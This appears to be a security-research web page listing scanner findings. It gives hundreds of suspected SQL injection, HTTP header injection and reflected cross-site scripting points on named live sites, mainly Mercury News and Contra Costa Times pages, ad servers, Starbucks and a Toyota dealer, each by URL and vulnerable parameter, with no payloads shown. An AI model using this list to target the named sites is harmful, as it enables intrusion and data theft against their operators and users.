Cross Site Scripting Reports | Hoyt LLC Research

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading

1. SQL injection

1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter]

1.2. http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ [REST URL parameter 3]

1.3. http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ [name of an arbitrarily supplied request parameter]

1.4. http://blogs.mercurynews.com/extrabaggs/ [name of an arbitrarily supplied request parameter]

1.5. http://blogs.mercurynews.com/extrabaggs/2010/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/ [REST URL parameter 2]

1.6. http://blogs.mercurynews.com/extrabaggs/2010/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/ [REST URL parameter 2]

1.7. http://blogs.mercurynews.com/kawakami/ [REST URL parameter 1]

1.8. http://blogs.mercurynews.com/sharks/ [name of an arbitrarily supplied request parameter]

1.9. http://blogs.mercurynews.com/sharks/ [name of an arbitrarily supplied request parameter]

1.10. http://blogs.mercurynews.com/warriors/ [Referer HTTP header]

1.11. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200125.xml [REST URL parameter 3]

1.12. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200222.xml [REST URL parameter 1]

1.13. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200222.xml [REST URL parameter 4]

1.14. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200224.xml [REST URL parameter 2]

1.15. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200224.xml [REST URL parameter 3]

1.16. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200729.xml [name of an arbitrarily supplied request parameter]

1.17. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200733.xml [REST URL parameter 4]

1.18. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200736.xml [REST URL parameter 4]

1.19. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200738.xml [REST URL parameter 4]

1.20. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200742.xml [REST URL parameter 3]

1.21. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200742.xml [REST URL parameter 4]

1.22. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200743.xml [REST URL parameter 3]

1.23. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200744.xml [REST URL parameter 4]

1.24. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200746.xml [REST URL parameter 1]

1.25. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200746.xml [REST URL parameter 4]

1.26. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200747.xml [REST URL parameter 4]

1.27. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200747.xml [REST URL parameter 5]

1.28. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 1]

1.29. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 4]

1.30. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 5]

1.31. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200749.xml [REST URL parameter 1]

1.32. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200749.xml [REST URL parameter 5]

1.33. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200750.xml [REST URL parameter 4]

1.34. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200753.xml [REST URL parameter 3]

1.35. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200753.xml [REST URL parameter 4]

1.36. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200754.xml [REST URL parameter 1]

1.37. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200756.xml [REST URL parameter 4]

1.38. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200757.xml [REST URL parameter 1]

1.39. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200757.xml [REST URL parameter 4]

1.40. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200759.xml [REST URL parameter 3]

1.41. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200759.xml [REST URL parameter 4]

1.42. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200760.xml [REST URL parameter 3]

1.43. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200764.xml [REST URL parameter 1]

1.44. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200764.xml [REST URL parameter 5]

1.45. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 3]

1.46. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 4]

1.47. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 5]

1.48. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200769.xml [REST URL parameter 4]

1.49. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200772.xml [REST URL parameter 1]

1.50. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200772.xml [REST URL parameter 4]

1.51. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200774.xml [REST URL parameter 3]

1.52. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200775.xml [REST URL parameter 5]

1.53. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200776.xml [REST URL parameter 1]

1.54. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200776.xml [REST URL parameter 4]

1.55. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200777.xml [REST URL parameter 1]

1.56. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200778.xml [REST URL parameter 4]

1.57. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200779.xml [REST URL parameter 3]

1.58. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200781.xml [REST URL parameter 1]

1.59. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200782.xml [REST URL parameter 1]

1.60. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200782.xml [REST URL parameter 3]

1.61. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200783.xml [REST URL parameter 1]

1.62. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200783.xml [REST URL parameter 4]

1.63. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200784.xml [REST URL parameter 1]

1.64. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200785.xml [REST URL parameter 1]

1.65. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200786.xml [REST URL parameter 1]

1.66. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200786.xml [REST URL parameter 4]

1.67. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200789.xml [REST URL parameter 3]

1.68. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200792.xml [REST URL parameter 3]

1.69. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200792.xml [REST URL parameter 4]

1.70. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200795.xml [REST URL parameter 3]

1.71. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200795.xml [REST URL parameter 4]

1.72. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200902.xml [REST URL parameter 3]

1.73. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200906.xml [REST URL parameter 3]

1.74. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200907.xml [REST URL parameter 1]

1.75. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200907.xml [REST URL parameter 4]

1.76. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200908.xml [REST URL parameter 4]

1.77. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200909.xml [REST URL parameter 4]

1.78. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200910.xml [REST URL parameter 1]

1.79. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200911.xml [REST URL parameter 1]

1.80. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200911.xml [REST URL parameter 3]

1.81. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200912.xml [REST URL parameter 3]

1.82. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200913.xml [REST URL parameter 4]

1.83. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200914.xml [REST URL parameter 4]

1.84. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200915.xml [REST URL parameter 3]

1.85. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200916.xml [REST URL parameter 1]

1.86. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200916.xml [REST URL parameter 3]

1.87. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200917.xml [REST URL parameter 1]

1.88. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200918.xml [REST URL parameter 1]

1.89. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200922.xml [REST URL parameter 1]

1.90. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200922.xml [REST URL parameter 2]

1.91. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200923.xml [REST URL parameter 4]

1.92. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200924.xml [REST URL parameter 3]

1.93. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200925.xml [REST URL parameter 4]

1.94. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200927.xml [REST URL parameter 4]

1.95. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200929.xml [REST URL parameter 4]

1.96. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200930.xml [REST URL parameter 1]

1.97. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200934.xml [REST URL parameter 1]

1.98. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200935.xml [REST URL parameter 1]

1.99. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200935.xml [REST URL parameter 4]

1.100. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200936.xml [REST URL parameter 4]

1.101. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200939.xml [REST URL parameter 4]

1.102. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200946.xml [REST URL parameter 3]

1.103. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200950.xml [REST URL parameter 4]

1.104. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200952.xml [REST URL parameter 3]

1.105. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200953.xml [REST URL parameter 1]

1.106. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200956.xml [REST URL parameter 4]

1.107. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200957.xml [REST URL parameter 3]

1.108. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200957.xml [REST URL parameter 4]

1.109. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200960.xml [REST URL parameter 4]

1.110. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/203708.xml [REST URL parameter 1]

1.111. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/203708.xml [REST URL parameter 4]

1.112. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/210701.xml [REST URL parameter 3]

1.113. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/214511.xml [REST URL parameter 4]

1.114. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/214511.xml [REST URL parameter 5]

1.115. http://metrics.carpricesecrets.com/b/ss/cvencarpricesecrets/1/H.16/s75690248599275 [REST URL parameter 3]

1.116. http://metrics.carpricesecrets.com/b/ss/cvennewscars/1/H.14/ [REST URL parameter 1]

1.117. http://metrics.carpricesecrets.com/b/ss/cvennewscars/1/H.14/ [REST URL parameter 3]

1.118. http://open.ad.yieldmanager.net/a1 [conTy2 parameter]

1.119. http://open.ad.yieldmanager.net/a1 [name of an arbitrarily supplied request parameter]

1.120. http://open.ad.yieldmanager.net/a1 [sltId2 parameter]

1.121. http://sanfrancisco.giants.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]

1.122. http://tap.rubiconproject.com/oz/sensor [au cookie]

1.123. http://tap.rubiconproject.com/oz/sensor [cd cookie]

1.124. http://tap.rubiconproject.com/oz/sensor [cd parameter]

1.125. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]

1.126. http://tap.rubiconproject.com/oz/sensor [put_1986 cookie]

1.127. http://tap.rubiconproject.com/oz/sensor [put_1994 cookie]

1.128. http://tap.rubiconproject.com/oz/sensor [rpb cookie]

1.129. http://www.bkrtx.com/js/bk-static.js [REST URL parameter 1]

1.130. http://www.bkrtx.com/js/bk-static.js [REST URL parameter 2]

1.131. http://www.carpricesecrets.com/mercury [t_mtype parameter]

1.132. http://www.contracostatimes.com/california/ci_16783052 [Referer HTTP header]

1.133. http://www.contracostatimes.com/ci_16759989 [Referer HTTP header]

1.134. http://www.contracostatimes.com/ci_16774009 [UserType cookie]

1.135. http://www.contracostatimes.com/ci_16790597 [EMETA_COOKIE_CHECK_MNGI cookie]

1.136. http://www.contracostatimes.com/ci_16790963 [fPage cookie]

1.137. http://www.contracostatimes.com/ci_16790963 [s_sq cookie]

1.138. http://www.contracostatimes.com/ci_16791142 [Referer HTTP header]

1.139. http://www.contracostatimes.com/ci_16792343 [currBrandCheck cookie]

1.140. http://www.contracostatimes.com/ci_16792616 [u cookie]

1.141. http://www.contracostatimes.com/news/ci_16783847 [User-Agent HTTP header]

1.142. http://www.contracostatimes.com/news/ci_16791147 [EMETA_COOKIE_CHECK_MNGI cookie]

1.143. http://www.contracostatimes.com/news/ci_16791147 [name of an arbitrarily supplied request parameter]

1.144. http://www.contracostatimes.com/news/ci_16792343 [nclick_check parameter]

1.145. http://www.contracostatimes.com/samesexmarriage/ci_16792108 [source parameter]

1.146. http://www.facebook.com/logout.php [campaign_click_url cookie]

1.147. http://www.fremonttoyota.com/AF2/milapi/0.2/mil.php [confid parameter]

1.148. http://www.fremonttoyota.com/Toyota-Dealer/Fremont/About%20Us/ [User-Agent HTTP header]

1.149. http://www.fremonttoyota.com/Toyota-Dealer/Fremont/About%20Us/ [__utma cookie]

1.150. http://www.fremonttoyota.com/Toyota-Dealer/San%20Leandro/About%20Us/ [REST URL parameter 1]

1.151. http://www.fremonttoyota.com/Toyota/Corolla/ [REST URL parameter 1]

1.152. http://www.fremonttoyota.com/Toyota/Highlander%20Hybrid/ [__utmb cookie]

1.153. http://www.fremonttoyota.com/Toyota/Sequoia/ [Referer HTTP header]

1.154. http://www.fremonttoyota.com/Toyota/Sienna/ [REST URL parameter 1]

1.155. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [Referer HTTP header]

1.156. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [__utmb cookie]

1.157. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x2/ [Referer HTTP header]

1.158. http://www.fremonttoyota.com/Toyota/Venza/ [BIGipServerAPACHE_DEV cookie]

1.159. http://www.fremonttoyota.com/Toyota/Venza/ [Referer HTTP header]

1.160. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 3]

1.161. http://www.fremonttoyota.com/inventory.php [__utmc cookie]

1.162. http://www.fremonttoyota.com/quick-quote.html [REST URL parameter 1]

1.163. http://www.fremonttoyota.com/search/CPO+t [__utmz cookie]

1.164. http://www.fremonttoyota.com/search/New+Toyota+tm [__utmb cookie]

1.165. http://www.legacy.com/services/obitrss.asp [Source parameter]

1.166. http://www.linkatopia.com/ [Referer HTTP header]

1.167. http://www.linkatopia.com/ [User-Agent HTTP header]

1.168. http://www.linkatopia.com/ [name of an arbitrarily supplied request parameter]

1.169. http://www.mercurynews.com/49ers/ci_16794130 [fPage cookie]

1.170. http://www.mercurynews.com/action-line/ci_16799546 [Zvents cookie]

1.171. http://www.mercurynews.com/bay-area-living/ci_16790631 [name of an arbitrarily supplied request parameter]

1.172. http://www.mercurynews.com/breaking-news/ci_16799837 [Referer HTTP header]

1.173. http://www.mercurynews.com/breaking-news/ci_16799883 [__g_c cookie]

1.174. http://www.mercurynews.com/breaking-news/ci_16800002 [name of an arbitrarily supplied request parameter]

1.175. http://www.mercurynews.com/business/ci_16792615 [Referer HTTP header]

1.176. http://www.mercurynews.com/business/ci_16792615 [User-Agent HTTP header]

1.177. http://www.mercurynews.com/business/ci_16792615 [UserID cookie]

1.178. http://www.mercurynews.com/business/ci_16792615 [name of an arbitrarily supplied request parameter]

1.179. http://www.mercurynews.com/business/ci_16799883 [__qca cookie]

1.180. http://www.mercurynews.com/business/ci_16799883 [u cookie]

1.181. http://www.mercurynews.com/business/ci_16799954 [Referer HTTP header]

1.182. http://www.mercurynews.com/california-high-speed-rail/ci_16793216 [name of an arbitrarily supplied request parameter]

1.183. http://www.mercurynews.com/celebrities/ci_16800030 [Zvents cookie]

1.184. http://www.mercurynews.com/celebrities/ci_16800030 [__g_u cookie]

1.185. http://www.mercurynews.com/celebrities/ci_16800030 [s_cc cookie]

1.186. http://www.mercurynews.com/ci_16761580 [currBrandCheck cookie]

1.187. http://www.mercurynews.com/ci_16791927 [JSESSIONID cookie]

1.188. http://www.mercurynews.com/ci_16791927 [UserID cookie]

1.189. http://www.mercurynews.com/ci_16791927 [__g_u cookie]

1.190. http://www.mercurynews.com/ci_16791927 [name of an arbitrarily supplied request parameter]

1.191. http://www.mercurynews.com/ci_16794599 [source parameter]

1.192. http://www.mercurynews.com/ci_16794599 [u cookie]

1.193. http://www.mercurynews.com/ci_16797127 [UserID cookie]

1.194. http://www.mercurynews.com/ci_16797127 [name of an arbitrarily supplied request parameter]

1.195. http://www.mercurynews.com/ci_16797127 [s_cc cookie]

1.196. http://www.mercurynews.com/ci_16797755 [Referer HTTP header]

1.197. http://www.mercurynews.com/ci_16797755 [Referer HTTP header]

1.198. http://www.mercurynews.com/ci_16797755 [currBrandCheck cookie]

1.199. http://www.mercurynews.com/college-sports/ci_16785433 [u cookie]

1.200. http://www.mercurynews.com/college-sports/ci_16785923 [UserType cookie]

1.201. http://www.mercurynews.com/college-sports/ci_16793572 [UserID cookie]

1.202. http://www.mercurynews.com/college-sports/ci_16793572 [__g_c cookie]

1.203. http://www.mercurynews.com/college-sports/ci_16793572 [fPage cookie]

1.204. http://www.mercurynews.com/college-sports/ci_16793572 [u cookie]

1.205. http://www.mercurynews.com/college-sports/ci_16793781 [Referer HTTP header]

1.206. http://www.mercurynews.com/college-sports/ci_16793781 [s_sq cookie]

1.207. http://www.mercurynews.com/college-sports/ci_16793781 [source parameter]

1.208. http://www.mercurynews.com/college-sports/ci_16795084 [User-Agent HTTP header]

1.209. http://www.mercurynews.com/college-sports/ci_16795084 [UserID cookie]

1.210. http://www.mercurynews.com/college-sports/ci_16795084 [__g_u cookie]

1.211. http://www.mercurynews.com/college-sports/ci_16795084 [__qca cookie]

1.212. http://www.mercurynews.com/college-sports/ci_16795084 [currBrandCheck cookie]

1.213. http://www.mercurynews.com/columns/ci_16799883 [Zvents cookie]

1.214. http://www.mercurynews.com/crime-courts/ci_16792429 [Referer HTTP header]

1.215. http://www.mercurynews.com/crime-courts/ci_16792429 [UserID cookie]

1.216. http://www.mercurynews.com/crime-courts/ci_16792429 [__g_c cookie]

1.217. http://www.mercurynews.com/crime-courts/ci_16800051 [UserType cookie]

1.218. http://www.mercurynews.com/entertainment/ci_16753906 [__g_u cookie]

1.219. http://www.mercurynews.com/entertainment/ci_16753906 [fPage cookie]

1.220. http://www.mercurynews.com/entertainment/ci_16777054 [Referer HTTP header]

1.221. http://www.mercurynews.com/entertainment/ci_16799215 [name of an arbitrarily supplied request parameter]

1.222. http://www.mercurynews.com/entertainment/ci_16800206 [Zvents cookie]

1.223. http://www.mercurynews.com/giants/ci_16745927 [s_sq cookie]

1.224. http://www.mercurynews.com/giants/ci_16755841 [Zvents cookie]

1.225. http://www.mercurynews.com/giants/ci_16755841 [fcspersistslider1 cookie]

1.226. http://www.mercurynews.com/giants/ci_16755841 [name of an arbitrarily supplied request parameter]

1.227. http://www.mercurynews.com/giants/ci_16755841 [u cookie]

1.228. http://www.mercurynews.com/giants/ci_16765848 [s_cc cookie]

1.229. http://www.mercurynews.com/giants/ci_16785859 [User-Agent HTTP header]

1.230. http://www.mercurynews.com/giants/ci_16793528 [Zvents cookie]

1.231. http://www.mercurynews.com/giants/ci_16793528 [__g_u cookie]

1.232. http://www.mercurynews.com/giants/ci_16793528 [source parameter]

1.233. http://www.mercurynews.com/high-school-sports/ci_16780570 [currBrandCheck cookie]

1.234. http://www.mercurynews.com/high-school-sports/ci_16780570 [name of an arbitrarily supplied request parameter]

1.235. http://www.mercurynews.com/high-school-sports/ci_16781152 [fPage cookie]

1.236. http://www.mercurynews.com/high-school-sports/ci_16781473 [JSESSIONID cookie]

1.237. http://www.mercurynews.com/high-school-sports/ci_16781501 [JSESSIONID cookie]

1.238. http://www.mercurynews.com/high-school-sports/ci_16781501 [source parameter]

1.239. http://www.mercurynews.com/high-school-sports/ci_16792321 [Referer HTTP header]

1.240. http://www.mercurynews.com/nation-world/ci_16796747 [Referer HTTP header]

1.241. http://www.mercurynews.com/nation-world/ci_16797757 [UserID cookie]

1.242. http://www.mercurynews.com/news/ci_16800002 [Referer HTTP header]

1.243. http://www.mercurynews.com/opinion/ci_16791987 [currBrandCheck cookie]

1.244. http://www.mercurynews.com/opinion/ci_16792028 [UserID cookie]

1.245. http://www.mercurynews.com/opinion/ci_16792028 [fPage cookie]

1.246. http://www.mercurynews.com/opinion/ci_16792028 [fcspersistslider1 cookie]

1.247. http://www.mercurynews.com/opinion/ci_16792028 [s_cc cookie]

1.248. http://www.mercurynews.com/opinion/ci_16798841 [Referer HTTP header]

1.249. http://www.mercurynews.com/scott-herhold/ci_16765193 [s_cc cookie]

1.250. http://www.mercurynews.com/sharks/ci_16778369 [Referer HTTP header]

1.251. http://www.mercurynews.com/sharks/ci_16778369 [__qca cookie]

1.252. http://www.mercurynews.com/sharks/ci_16778369 [fcspersistslider1 cookie]

1.253. http://www.mercurynews.com/sharks/ci_16779655 [Referer HTTP header]

1.254. http://www.mercurynews.com/sharks/ci_16779655 [User-Agent HTTP header]

1.255. http://www.mercurynews.com/sharks/ci_16779655 [UserID cookie]

1.256. http://www.mercurynews.com/sharks/ci_16779655 [__g_c cookie]

1.257. http://www.mercurynews.com/sharks/ci_16785264 [REST URL parameter 1]

1.258. http://www.mercurynews.com/sharks/ci_16794268 [UserType cookie]

1.259. http://www.mercurynews.com/sharks/ci_16794268 [source parameter]

1.260. http://www.mercurynews.com/sharks/ci_16794268 [u cookie]

1.261. http://www.mercurynews.com/sharks/ci_16795056 [fPage cookie]

1.262. http://www.mercurynews.com/tim-kawakami/ci_16739351 [User-Agent HTTP header]

1.263. http://www.mercurynews.com/tim-kawakami/ci_16755984 [UserID cookie]

1.264. http://www.mercurynews.com/tim-kawakami/ci_16755984 [Zvents cookie]

1.265. http://www.mercurynews.com/tim-kawakami/ci_16755984 [source parameter]

1.266. http://www.mercurynews.com/tim-kawakami/ci_16755984 [u cookie]

1.267. http://www.mercurynews.com/tim-kawakami/ci_16781111 [UserType cookie]

1.268. http://www.mercurynews.com/tim-kawakami/ci_16781111 [currBrandCheck cookie]

1.269. http://www.mercurynews.com/tim-kawakami/ci_16793240 [source parameter]

1.270. http://www.mercurynews.com/warriors/ci_16780373 [UserID cookie]

1.271. http://www.mercurynews.com/warriors/ci_16781614 [Referer HTTP header]

1.272. http://www.mercurynews.com/warriors/ci_16781614 [currBrandCheck cookie]

1.273. http://www.mercurynews.com/warriors/ci_16786557 [REST URL parameter 1]

1.274. http://www.mercurynews.com/warriors/ci_16792619 [User-Agent HTTP header]

1.275. http://www.mercurynews.com/warriors/ci_16792619 [UserID cookie]

1.276. http://www.mercurynews.com/warriors/ci_16792619 [UserType cookie]

1.277. http://www.mercurynews.com/warriors/ci_16792619 [UserType cookie]

1.278. http://www.mercurynews.com/warriors/ci_16792619 [__g_c cookie]

1.279. http://www.mercurynews.com/warriors/ci_16792619 [__g_u cookie]

1.280. http://www.mercurynews.com/warriors/ci_16794092 [UserID cookie]

1.281. http://www.mercurynews.com/warriors/ci_16794092 [Zvents cookie]

1.282. http://www.mercurynews.com/warriors/ci_16794092 [fPage cookie]

1.283. http://www.mercurynews.com/weird-news/ci_16784172 [fPage cookie]

1.284. https://www.starbucks.com/account/partneracct/IDMLogin [name of an arbitrarily supplied request parameter]

1.285. https://www.starbucks.com/card/manage/check-your-balance [User-Agent HTTP header]

1.286. https://www.starbucks.com/card/rewards/card-rewards-canada [Referer HTTP header]

1.287. https://www.starbucks.com/card/rewards/program-information [User-Agent HTTP header]

1.288. https://www.starbucks.com/card/starbucks-gold [.SbuxAuth cookie]

1.289. http://www.ucsc-extension.edu/sites/all/modules/drupal-contrib/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 1]

1.290. http://www.ucsc-extension.edu/video/guy-kawasaki [name of an arbitrarily supplied request parameter]

2. XPath injection

3. HTTP header injection

3.1. http://redacted/ad/N3550.288595.MNG.COM/B5040651.75 [REST URL parameter 1]

3.2. http://redacted/adi/N3753.BayAreaNewsGroup-NNN/B4496828.10 [REST URL parameter 1]

3.3. http://redacted/adj/mdm.aolcreatives/DiabetesAds [REST URL parameter 1]

3.4. http://redacted/adj/mercurynews.com/targetweekly [REST URL parameter 1]

3.5. http://redacted/jump/N3550.288595.MNG.COM/B5040651.75 [REST URL parameter 1]

3.6. http://redacted/jump/contracostatimes.com/targetweekly [REST URL parameter 1]

3.7. http://redacted/jump/mercurynews.com/ [REST URL parameter 1]

3.8. http://redacted/jump/mercurynews.com/targetweekly [REST URL parameter 1]

3.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

3.10. http://www.mtgeinfo.com/sjmn/ [REST URL parameter 1]

3.11. http://www.widgetserver.com/syndication/get_widget.js [callback parameter]

4. Cross-site scripting (reflected)

4.1. http://ap.feeds.theplatform.com/ps/getRSS [CustomBoolean|isNational|true&query parameter]

4.2. http://ap.feeds.theplatform.com/ps/getRSS [PID parameter]

4.3. http://ap.feeds.theplatform.com/ps/getRSS [endIndex parameter]

4.4. http://ap.feeds.theplatform.com/ps/getRSS [query parameter]

4.5. http://ap.feeds.theplatform.com/ps/getRSS [startIndex parameter]

4.6. http://bid.openx.net/json [c parameter]

4.7. http://cdn.widgetserver.com/syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/a799b2a11500968f70468142cdb62dae0dd701250000012cb7e9051a/u/1/ [REST URL parameter 18]

4.8. http://cdn.widgetserver.com/syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/a799b2a11500968f70468142cdb62dae0dd701250000012cb7e9051a/u/1/ [REST URL parameter 4]

4.9. http://courses.ucsc-extension.edu/ucsc/public/category/courseDetails.do [selectedProgramStreamId parameter]

4.10. http://dean.edwards.name/base/forEach.js [REST URL parameter 1]

4.11. http://dean.edwards.name/base/forEach.js [REST URL parameter 1]

4.12. http://dean.edwards.name/base/forEach.js [REST URL parameter 2]

4.13. http://dean.edwards.name/weblog/2005/10/add-event/ [REST URL parameter 1]

4.14. http://dean.edwards.name/weblog/2005/10/add-event/ [REST URL parameter 1]

4.15. http://dean.edwards.name/weblog/2005/10/add-event/ [REST URL parameter 4]

4.16. http://dean.edwards.name/weblog/2005/10/add-event/ [name of an arbitrarily supplied request parameter]

4.17. http://event.adxpose.com/event.flow [uid parameter]

4.18. http://events.contracostatimes.com/ [name of an arbitrarily supplied request parameter]

4.19. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]

4.20. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]

4.21. http://forums.contracostatimes.com/ [name of an arbitrarily supplied request parameter]

4.22. http://forums.contracostatimes.com/forum/article-comments-comments-on-news [REST URL parameter 1]

4.23. http://forums.contracostatimes.com/forum/article-comments-comments-on-news [REST URL parameter 2]

4.24. http://forums.contracostatimes.com/forum/article-comments-comments-on-news [name of an arbitrarily supplied request parameter]

4.25. http://forums.contracostatimes.com/poll [REST URL parameter 1]

4.26. http://forums.contracostatimes.com/poll [name of an arbitrarily supplied request parameter]

4.27. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]

4.28. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 1]

4.29. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 2]

4.30. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 3]

4.31. http://forums.mercurynews.com/forums/poll [REST URL parameter 1]

4.32. http://forums.mercurynews.com/forums/poll [REST URL parameter 2]

